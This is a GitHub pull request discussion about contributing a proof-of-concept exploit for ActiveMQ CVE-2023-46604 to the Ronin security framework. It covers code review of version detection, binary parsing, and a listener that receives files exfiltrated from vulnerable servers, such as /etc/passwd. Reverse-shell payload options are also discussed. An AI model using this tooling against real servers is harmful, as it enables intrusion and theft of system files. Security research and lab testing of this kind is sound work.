POC exploit for CVE-2023-46604
ronin-rb/community-pocs pull request #10
Opened 2024-05-04 20:23 UTC by flavorjones

Feedback welcome, I'm not sure what's expected of a contributed POC.

As mentioned in the comments, I tested this against local docker containers. Vulnerable versions are correctly detected with `perform_test`. Vulnerable servers connect to the embedded web server for the injection and to exfiltrate `/etc/passwd` as a demonstration.

Closes #7

2024-05-04 23:37 UTC, postmodern requested changes
Wow wasn't expecting someone to jump in so quickly, this is great work considering your new to the project.

I included a bunch of minor suggestions on how to DRY up the code by using more built-in Ronin APIs.

We also need to decide whether to use an arbitrary `CommandPayload` in the XML, which would allow executing any command payload, including `cmd/*/reverse_shell` payloads in addition to file exfil payloads. Or keep the logic that only exfils a single file to a local web server.

I like the idea of a single file HTTP exfil payload, and think we should extract that into a `Ronin::Payloads::Mixins::WebServer`, `Ronin::Payloads::Mixins::HTTPExfil`, or `Ronin::Exploits::Mixins::WebServer`, `Ronin::Exploits::Mixins::HTTPExfil` module.

(I also think I should add a `tcp_read` or `tcp_recv` helper method to `ronin-support` to DRY up that `tcp_connect` code.)

2024-05-04 23:37 UTC, postmodern commented on exploits/activemq/CVE-2023-46604.rb
> +        "https://nvd.nist.gov/vuln/detail/CVE-2023-46604",
Should also include links to the previous PoCs (both to the GitHub repo and exploit file).

2024-05-04 23:37 UTC, postmodern commented on exploits/activemq/CVE-2023-46604.rb
> +      register "CVE-2023-46604"
Should be `activemq/CVE-2023-46604` so that it matches the file name relative to `exploits/`; I actually need to fix this in the `ronin-exploits new` command.

2024-05-04 23:37 UTC, postmodern commented on exploits/activemq/CVE-2023-46604.rb
> +# :markup: markdown
I probably need to setup a YARD task with markdown enabled by default.

2024-05-04 23:37 UTC, postmodern commented on exploits/activemq/CVE-2023-46604.rb
> +#
Move the documentation block just above the inner class definition, so that YARD will recognize it as belonging to the class and not the `Ronin` module.

2024-05-04 23:37 UTC, postmodern commented on exploits/activemq/CVE-2023-46604.rb
> +    class Cve202346604 < Exploit
Should also be `CVE_2023_46604` to make the CVE year and ID numbers more readable; which I also need to fix in the `ronin-exploits new` command.

2024-05-04 23:37 UTC, postmodern commented on exploits/activemq/CVE-2023-46604.rb
> +          wireformat_message = socket.read
This also gives me an idea for a `tcp_read` or `tcp_recv` mixin method to DRY this type of code up.

2024-05-04 23:37 UTC, postmodern commented on exploits/activemq/CVE-2023-46604.rb
> +        server = WEBrick::HTTPServer.new(
Might want to use `Web.server do ... end` or define a `Web::Server::Base` sub-class. Although, `Web.server` uses `class_eval` (I might need to change that to `class_exec`), so that would make it hard to access the outer scope and `@queue`.

2024-05-04 23:37 UTC, postmodern commented on exploits/activemq/CVE-2023-46604.rb
> +            type: Integer, default: 1024 + rand(65535 - 1024),
Should be `param :web_port, Integer`. Appears that `ronin-exploits` has a bug in it's examples where it recommends `param :foo, type: Class` instead of the new style of `param :foo, Class`.

2024-05-04 23:37 UTC, postmodern commented on exploits/activemq/CVE-2023-46604.rb
> +            type: String, default: "localhost",
All params default to type `String`, so `type: String` isn't necessary.

2024-05-04 23:37 UTC, postmodern commented on exploits/activemq/CVE-2023-46604.rb
> +          plen = message.unpack1("n", offset: cursor) ; cursor += 2
Definitely feels like a candidate for [`Support::Binary::Stream`](https://ronin-rb.dev/docs/ronin-support/Ronin/Support/Binary/Stream.html) or using the [`IO`](https://ronin-rb.dev/docs/ronin-support/IO.html) `read_*` methods which eliminates the need for a `cursor` variable.

2024-05-04 23:37 UTC, postmodern commented on exploits/activemq/CVE-2023-46604.rb
> +          raise "unknown primitive type #{ptype}, expected #{STRING_TYPE}" if ptype != STRING_TYPE
Maybe `raise` `ExploitFailed`, otherwise `ronin-exploits run` will treat it as an unexpected error from the exploit.

2024-05-04 23:37 UTC, postmodern commented on exploits/activemq/CVE-2023-46604.rb
> +          puts message.to_hexdump
Use `.hexdump` which should be available on `String` and `IO` classes, and will automatically print to `$stdout`. You may need to explicitly `require 'hexdump'` to load it.

2024-05-05 00:23 UTC, postmodern commented
@flavorjones also where did you get `param :foo, type: Class, ...` from? I suspect there's some old documentation that still mentions the "old style" of defining params before I changed it to `param :foo, Class, ...`, but I can't find where it still mentions `type:`.

2024-05-05 00:34 UTC, postmodern commented
I'm also curious if this successfully runs against the [vulhub activemq docker-compose file for CVE-2023-46604](https://github.com/vulhub/vulhub/tree/cbeb60f466408e08f554245906378013af2d2156/activemq/CVE-2023-46604).

2024-05-05 17:56 UTC, flavorjones commented
Thanks for the review! I'll address or reply to the review comments today.

Re: your other questions ...

> I like the idea of a single file HTTP exfil payload, and think we should extract that into a Ronin::Payloads::Mixins::WebServer, Ronin::Payloads::Mixins::HTTPExfil, or Ronin::Exploits::Mixins::WebServer, Ronin::Exploits::Mixins::HTTPExfil module

Yeah, that makes sense and I'm happy to do that work as a separate commit in this PR if you're OK with it (else I can open a separate PR).

> where did you get param :foo, type: Class, ... from? I suspect there's some old documentation ...

Honestly I have no idea. I had like ten web pages open (as well as an older version of Ronin on disk) trying to get a first draft working, and ended up with this syntax. Maybe I imagined it?

> I'm also curious if this successfully runs against the [vulhub activemq docker-compose file for CVE-2023-46604](https://github.com/vulhub/vulhub/tree/cbeb60f466408e08f554245906378013af2d2156/activemq/CVE-2023-46604).

Yes! As long as I add host networking to the `docker-compose.yml` file (so the AMQ server can connect back to the web server):

```patch
diff --git a/activemq/CVE-2023-46604/docker-compose.yml b/activemq/CVE-2023-46604/docker-compose.yml
index 1da45062..b907c6d8 100644
--- a/activemq/CVE-2023-46604/docker-compose.yml
+++ b/activemq/CVE-2023-46604/docker-compose.yml
@@ -6,3 +6,4 @@ services:
     - "61616:61616"
     - "8161:8161"
     - "5005:5005"
+   network_mode: host
```

2024-05-05 18:13 UTC, flavorjones commented on exploits/activemq/CVE-2023-46604.rb
> +# :markup: markdown
Or just use YARD format!

2024-05-05 18:23 UTC, flavorjones commented on exploits/activemq/CVE-2023-46604.rb
> +    class Cve202346604 < Exploit
I can't find a `CommandInjection` class anywhere. Can you point me in the right direction?

2024-05-05 18:25 UTC, flavorjones commented on exploits/activemq/CVE-2023-46604.rb
> +      param :port,
Ah! `default_port` was the thing I was missing. :pray:

2024-05-05 19:18 UTC, postmodern commented on exploits/activemq/CVE-2023-46604.rb
> +    class Cve202346604 < Exploit
@flavorjones It's defined in the [`ronin-exploits` `1.1.0` branch](https://github.com/ronin-rb/ronin-exploits/blob/1.1.0/lib/ronin/exploits/command_injection.rb) at the last minute when I realized I needed it. :/ This of course makes working on `community-pocs` a bit awkward until the new minor versions get released.

2024-05-05 19:42 UTC, flavorjones commented on exploits/activemq/CVE-2023-46604.rb
> +          plen = message.unpack1("n", offset: cursor) ; cursor += 2
I'll push a rewrite of this using Binary::Buffer. Using Stream is hard because I already have a String, so I'd need to wrap it in a StringIO first ... which I'm not sure is more readable or easier to understand. Short of writing a first-class OpenWire parser method, maybe using Buffer is good enough?

2024-05-05 19:46 UTC, flavorjones commented on exploits/activemq/CVE-2023-46604.rb
> +          plen = message.unpack1("n", offset: cursor) ; cursor += 2
OK, actually this isn't terrible:

```patch
diff --git a/exploits/activemq/CVE-2023-46604.rb b/exploits/activemq/CVE-2023-46604.rb
index 6a048b7c..15414152 100755
--- a/exploits/activemq/CVE-2023-46604.rb
+++ b/exploits/activemq/CVE-2023-46604.rb
@@ -2,6 +2,7 @@
 
 require "ronin/exploits/exploit"
 require "ronin/exploits/mixins/remote_tcp"
+require "ronin/support/binary/stream"
 require "ronin/web/server"
 
 module Ronin
@@ -89,6 +90,7 @@ def test
 
         version = pluck_provider_version(wireformat_message)
         return Unknown("host is not reporting a provider version") if version.nil?
+        print_info("Detected provider version: #{version}")
 
         version = Gem::Version.new(version)
         if (version < Gem::Version.new("5.15.16") && version >= Gem::Version.new("5.15.0")) ||
@@ -208,15 +210,15 @@ def pluck_provider_version(message)
         property_index = message.index(PROVIDER_VERSION)
         return nil if property_index.nil?
 
-        cursor = property_index + PROVIDER_VERSION.length
+        stream = Ronin::Support::Binary::Stream.new(StringIO.new(message[property_index + PROVIDER_VERSION.length..]))
 
-        ptype = message.unpack1("C", offset: cursor) ; cursor += 1
+        ptype = stream.read_byte
         raise ExploitFailed, "unknown primitive type #{ptype}, expected #{STRING_TYPE}" if ptype != STRING_TYPE
 
-        plen = message.unpack1("n", offset: cursor) ; cursor += 2
+        plen = stream.read_int16
         raise ExploitFailed, "unexpected string len #{plen}" if plen <= 0
 
-        message[cursor, plen]
+        stream.read_string(plen)
       end
     end
   end
```

2024-05-05 20:05 UTC, flavorjones commented on exploits/activemq/CVE-2023-46604.rb
> +        @buffer = IO::Buffer.new
It looks like `Support::Binary::Buffer` is writing things little-endian on my system, is that likely to be right? We definitely want big-ending / network-endian for the exploit.

2024-05-05 20:07 UTC, flavorjones commented on exploits/activemq/CVE-2023-46604.rb
> +        @buffer = IO::Buffer.new
Ah, ok, instead of `put_uint32(0, 1234)` I can use `put(:unit32_be, 0, 1234)` ... I'll do that.

2024-05-05 20:07 UTC, postmodern commented on exploits/activemq/CVE-2023-46604.rb
> +          plen = message.unpack1("n", offset: cursor) ; cursor += 2
I'm sure there are people who have strong opinions on whether to read first then decode, or decode while reading. Both are valid. Reading a String then decoding it has the benefit of being able to hexdump the whole String if we encounter an unexpected value.

If you're already passing in a String then just use `Support::Binary::Buffer`. If you want to use `Support::Binary::String`, either initialize it with the `socket`, or just call `.read_<ctype>` methods directly on the `socket`, since I've monkey-patched `IO` with `.read_<ctype>`/`.write_<ctype>` methods.

2024-05-05 20:17 UTC, flavorjones commented
I've force-pushed a bunch of changes, and resolved the conversations that I address with those changes.

2024-05-05 20:44 UTC, postmodern reviewed
You can specify `endian: :net` to make all data types network-endian. Also I posted some example code of using `Binary::Buffer` vs. `Binary::Stream`.

2024-05-05 20:44 UTC, postmodern commented on exploits/activemq/CVE-2023-46604.rb
> +        )
Actually, Maybe `Support::Binary::Buffer` might be better here, since we're only reading three fields after the property name string.

```ruby
io = StringIO.new(message)
io.seek(property_index + PROVIDER_VERSION.length)

stream = Support::Binary::Stream.new(io, endian: :net)
ptype = stream.read_byte
plen = stream.get_int16

return stream.read_string(plen)
```

vs.

```ruby
offset = property_index + PROVIDER_VERSION.length
buffer = Support::Binary::Buffer.new(message.byteslice(offset..), endian: :net)
ptype = buffer.get_byte(0)
plen = buffer.get_int16(1)

return buffer.get_string(3,plen)
```

2024-05-05 20:44 UTC, postmodern commented on exploits/activemq/CVE-2023-46604.rb
> +        raise ExploitFailed, "unknown primitive type #{ptype}, expected #{STRING_TYPE}" if ptype != STRING_TYPE
Use `fail("...")` since I override it in `Ronin::Exploits::Exploit` to `raise(ExploitFailed,...)`.

2024-05-05 20:44 UTC, postmodern commented on exploits/activemq/CVE-2023-46604.rb
> +        raise ExploitFailed, "unexpected string len #{plen}" if plen <= 0
Use `fail("...")`.

2024-05-05 20:44 UTC, postmodern commented on exploits/activemq/CVE-2023-46604.rb
> +        buffer = Ronin::Support::Binary::Buffer.new(1024)
Initialize with `endian: :net` if we're going to be writing network/big-endian data. Then you can use `.put_uint16(...)` inead of `.put(:uint16_be,...)`.

2024-05-05 21:18 UTC, postmodern commented
@flavorjones this is probably pretty ugly compared to your code, but I think I can simplify the `curl` exfil web server using `TCPServer` and really bad HTTP parsing logic.

```ruby
require 'socket'

CRLF = "\r\n".b
HEADER_SEPARATOR = CRLF * 2
BAD_REQUEST = [
  'HTTP/1.0 400 Bad Request',
  'Content-Type: text/html',
  'Connection: close',
  ''
].join(CRLF) + CRLF

OK = [
  'HTTP/1.1 200 OK',
  'Content-Type: text/html',
  'Content-Length: 0',
  'Connection: close',
  ''
].join(CRLF) + CRLF

host = '0.0.0.0'
port = ARGV[0].to_i

server = TCPServer.new(host,port)

loop do
  connection = server.accept

  request_line = connection.gets(CRLF)
  request_method, path, http_version = request_line.split(' ',3)

  unless path == '/exfil'
    connection.write(BAD_REQUEST)
    connection.close
    next
  end

  headers = {}

  until (line = connection.gets(CRLF, chomp: true)).empty?
    name, value = line.split(': ',2)
    headers[name] = value
  end

  content_length = if headers['Content-Length']
                     headers['Content-Length'].to_i
                   end

  file = connection.read(content_length)

  connection.write(OK)
  connection.close

  puts "[+] Received file:"
  puts file
end
```

2024-05-05 21:21 UTC, postmodern commented on exploits/activemq/CVE-2023-46604.rb
> +        @buffer = IO::Buffer.new
It will use your system's default endian-ness. Initialize the `Buffer`/`Stream` with `endian: :net`.

2024-05-05 22:07 UTC, postmodern requested changes
You can pull `ronin-web-server` from rubygems.

2024-05-05 22:07 UTC, postmodern commented on Gemfile
> +                                    ref: "v0.1.1"
[ronin-web-server](https://rubygems.org/gems/ronin-web-server) was released to https://rubygems.org.

2024-05-17 16:55 UTC, flavorjones commented on exploits/activemq/CVE-2023-46604.rb
> +        )
I like the Buffer version better, will update.

2024-05-17 17:01 UTC, flavorjones commented
@postmodern I've force-pushed a bunch of changes, and resolved the conversations that I address with those changes.

I'm open to pulling in your TCPServer implementation, but I personally think it's less obvious what's going on when it's imperative code. I admit the Ronin::Web implementation is not extremely obvious, though, and so I don't feel strongly either way. Your call!

2024-05-18 00:04 UTC, postmodern commented
> @postmodern I've force-pushed a bunch of changes, and resolved the conversations that I address with those changes.
> 
> I'm open to pulling in your TCPServer implementation, but I personally think it's less obvious what's going on when it's imperative code. I admit the Ronin::Web implementation is not extremely obvious, though, and so I don't feel strongly either way. Your call!
> 
> Also, I haven't done the payload work you suggested above yet simply because I haven't had time to dig in on it yet. I should be able to get to it next week!

@flavorjones excellent! Ultimately I will probably add a `Ronin::Exploits::Mixins::WebServer` which should handle most of the launch and cleanup code. Maybe something like:

```ruby
def web_server
  @web_server = Class.new(Ronin::Web::Server::Base)
  @web_server.set :exploit, self
  yield @web_server
  @web_server.run!
end
```

There's also some deep questions about whether the web server should be fully separate from the default `Ronin::Web::Server` instance, or co-mingle with whatever other routes have been defined in the default instance.

Until then we can use your code just to have something that works. Once there is a `Ronin::Exploits::Mixins::WebServer` module that handles the web server code (or a `Ronin::Payloads` payload which handles `curl` single-file exfilitrations), I'll come back and make the necessary edits and bump the `ronin-exploits` dependency in the `Gemfile`.

2024-05-18 04:24 UTC, postmodern approved these changes

2024-05-18 04:25 UTC, merged

2024-05-18 23:27 UTC, postmodern commented
@flavorjones going to add the GPLv3.0+ license per #12. Hope that's OK with you?

2024-05-19 00:41 UTC, flavorjones commented
Totally fine!